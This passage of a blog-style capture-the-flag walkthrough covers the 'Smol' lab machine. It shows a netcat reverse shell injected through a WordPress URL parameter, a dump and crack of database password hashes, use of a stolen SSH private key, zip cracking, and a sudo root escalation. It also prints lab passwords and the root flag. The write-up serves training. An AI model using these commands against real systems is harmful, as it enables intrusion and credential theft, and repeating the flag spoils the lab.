&lt;p&gt;Now, copy the reverse shell-&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;busybox nc &amp;lt;ip&amp;gt; 9001 -e sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and paste it into the link and click enter to get our callback 📞.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://www.smol.thm/wp-admin/edit.php?cmd=busybox nc &amp;lt;ip&amp;gt; 9001 -e sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F70su99duuc4ssivavbno.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F70su99duuc4ssivavbno.png" alt="Shell acclaimed" width="717" height="201"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🔑 Shell secured — time to explore the loot!&lt;/p&gt;

&lt;p&gt;Stabilizing the shell first:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;fg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So, what do we have in here…&lt;/p&gt;

&lt;p&gt;Looking around as a visitor. Nothing encountered.&lt;/p&gt;

&lt;p&gt;But my brain did. I got remembered about the SQL database that we saw in a PHP page. Lets &lt;em&gt;try&lt;/em&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysql -u wpuser -p
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enter the password we used to login for the user:&lt;br&gt;
&lt;strong&gt;kbLSF2Vop#lw3rjDZ629*Z%G&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftf9hqjdzlrni0rwcjhud.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftf9hqjdzlrni0rwcjhud.png" alt="MYSQL" width="682" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bam, it worked!&lt;/p&gt;

&lt;p&gt;Then to view the databases-&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;show databases;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F171h7qncjczvej82s3ju.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F171h7qncjczvej82s3ju.png" alt="database" width="357" height="290"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;we are looking for ‘&lt;strong&gt;wordpress&lt;/strong&gt;’ passwords, lets go for it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;use wordpress;
show tables;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will display the tables in wordpress database.&lt;br&gt;
Here we are looking for user’s passwords so:&lt;br&gt;
‘wp_users’ suits well.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;select * from wp_users;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmz5o0qeihw1fpw93from.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmz5o0qeihw1fpw93from.png" alt="user hashes" width="575" height="250"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🔐Well here, we have all the password hashes. Copy and save ALL of ’em hashes into a hash.txt file.&lt;/p&gt;

&lt;p&gt;Lets try de-hashing it with the help of &lt;strong&gt;&lt;em&gt;The Ripper&lt;/em&gt;.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;john hash.txt --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;The phpass format is a Portable PHP Password Hashing Framework used in WordPress.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;After a while of waiting my poor core usage at its fullest:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1gep6gio3trbof5tkb2k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1gep6gio3trbof5tkb2k.png" alt="core usage" width="194" height="49"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We’ll be getting the de-hashed value:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffohf86v47bl727bazwmc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffohf86v47bl727bazwmc.png" alt="Image description" width="800" height="185"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now when we look at the users where we found before in the process of using WPScan:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5gfqjc7l66g5anq9eg4t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5gfqjc7l66g5anq9eg4t.png" alt="Image description" width="339" height="199"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By seeing we are able to guess that the password: &lt;strong&gt;sandiegocalifornia&lt;/strong&gt; belongs to the user: &lt;strong&gt;diego&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffnlhawlag96t8ool0hkg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffnlhawlag96t8ool0hkg.png" alt="Image description" width="437" height="189"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1337!&lt;/strong&gt; We’re in as diego.    &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Its essential to note that- the privilege escalation that we’re doing here is in a Horizontal level Privilege Escalation&lt;br&gt;
After cd-ing into diego from /home&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;WE GOT OUR FIRST FLAG! 🚩&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkugizmzah2l55nqvjblm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkugizmzah2l55nqvjblm.png" alt="FLAG" width="357" height="150"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;Hotsy-totsy!&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now, we are also able to get into&lt;br&gt;
&lt;strong&gt;/home/gege&lt;/strong&gt; &amp;amp;&lt;br&gt;
&lt;strong&gt;/home/think&lt;/strong&gt; from diego.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd /home/gege
ls -la
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We are able to see the ‘wordpress.old.zip’ file. But when we try to unzip it, we aren’t able to really do it as it is owned by root.&lt;/p&gt;

&lt;p&gt;We will see what’s available in /home/think&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd /home/think
ls -la
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Good, we’re seeing something off the board here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbv97j8wo70urbtfbdp8b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbv97j8wo70urbtfbdp8b.png" alt="Image description" width="563" height="222"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd .ssh
ls -la
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kvpiy4abnpyb9bqa59o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kvpiy4abnpyb9bqa59o.png" alt="Image description" width="663" height="180"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat id_rsa
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Great, a private key!!&lt;br&gt;
Now, lets get into the think account completely.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ssh think@www.smol.thm -i id_rsa
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By doing this we get into the user of think.&lt;/p&gt;

&lt;p&gt;When we now get into&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd /home/gege
ls -la
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can witness that the file is still owned by the root&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsubu6wchk7c4zannun35.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsubu6wchk7c4zannun35.png" alt="Image description" width="575" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Aight! Now we shall do&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;su gege
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and start a server for us to download it into our machine and extract the password using zip2john.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python3 -m http.server 8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and when you navigate to the browser(&lt;a href="http://ip:8080" rel="noopener noreferrer"&gt;http://ip:8080&lt;/a&gt;), you would see&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi384zc2utkqzoc5c3buu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi384zc2utkqzoc5c3buu.png" alt="Image description" width="418" height="261"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;click on it to download.&lt;/p&gt;

&lt;p&gt;Once it is downloaded, head to the path of the downloaded file and get into the terminal from there.&lt;br&gt;
Then &lt;em&gt;clack&lt;/em&gt; the below cmd&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;zip2john wordpress.old.zip &amp;gt; wphash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It would be quick in it and a file of the name wphash would be created. the cat version of the file would look like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbpxh65riqv01wb2pxdj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbpxh65riqv01wb2pxdj.png" alt="Image description" width="800" height="116"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now. Let’s run &lt;strong&gt;&lt;em&gt;The Ripper&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F03wb8tjvatevc0tjw8sc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F03wb8tjvatevc0tjw8sc.png" alt="John the ripper" width="500" height="500"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;john wphash -w=/usr/share/wordlists/rockyou.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;DARN IT!&lt;/p&gt;

&lt;p&gt;That was quick!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frp3bazr5g8vpuzki24du.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frp3bazr5g8vpuzki24du.png" alt="Image description" width="800" height="222"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now getting back to the reverse shell terminal and trying to unzip the file&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F63hrnik9kcvcnvoxjuxa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F63hrnik9kcvcnvoxjuxa.png" alt="Image description" width="800" height="293"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd wordpress.old
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwjqov595jjaeo1h0blzs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwjqov595jjaeo1h0blzs.png" alt="Image description" width="800" height="153"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;LOOK!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk441wixr6ornlkr9l1kt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk441wixr6ornlkr9l1kt.png" alt="Image description" width="202" height="32"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our &lt;strong&gt;Finest DANGEROUS&lt;/strong&gt; file!&lt;/p&gt;

&lt;p&gt;And when we cat it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'xavi' );

/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got Xavi user’s Password too!!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;su xavi
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After getting into the xavi account with the help of the &lt;strong&gt;password&lt;/strong&gt; obtained:&lt;br&gt;
&lt;strong&gt;P@ssw0rdxavi@&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Lets see the permissions for xavi:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhvuarh884ml7g32akqb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhvuarh884ml7g32akqb.png" alt="Image description" width="800" height="181"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;💰Root-access AMAZING!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Type the below command to get into bash shell of xavi to become &lt;strong&gt;#ROOT&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo sudo /bin/sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then when we do the following&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhji4cu75gl0bmr24hxk7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhji4cu75gl0bmr24hxk7.png" alt="Image description" width="501" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;▄︻╦芫≡══ — HACKSTATIC!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;ROOT FLAG CAPTURED:&lt;br&gt;
&lt;strong&gt;bf89ea3ea01992353aef1f576214d4e4&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy292rrtjsvtu5172iw5n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy292rrtjsvtu5172iw5n.png" alt="Image description" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🔍 &lt;strong&gt;Wrapping Up: Small Box, Big Lessons&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Smol&lt;/strong&gt; machine might be tiny in name, but it packs a punch 💥 in teaching fundamental enumeration, privilege escalation, and shell exploitation techniques. This challenge reinforces the golden rule of penetration testing—never underestimate the "small" details 🧐, as they often hold the key 🔑 to unlocking the entire system.&lt;/p&gt;

&lt;p&gt;Whether you're a beginner sharpening your recon skills 🛠️ or a seasoned hacker looking for a quick thrill 🎯, Smol proves that size doesn’t always matter—&lt;strong&gt;methodology does&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Until next time, &lt;strong&gt;keep hacking, keep learning&lt;/strong&gt; 🧑‍💻, and remember: even the smallest misconfigurations can lead to the biggest vulnerabilities. ⚠️&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Follow me on &lt;a href="https://medium.com/@cybrpunked" rel="noopener noreferrer"&gt;Medium&lt;/a&gt; for more contents related to Cybesecurity!&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>pentesting</category>
      <category>ethicalhacking</category>
    </item>
  </channel>
</rss>
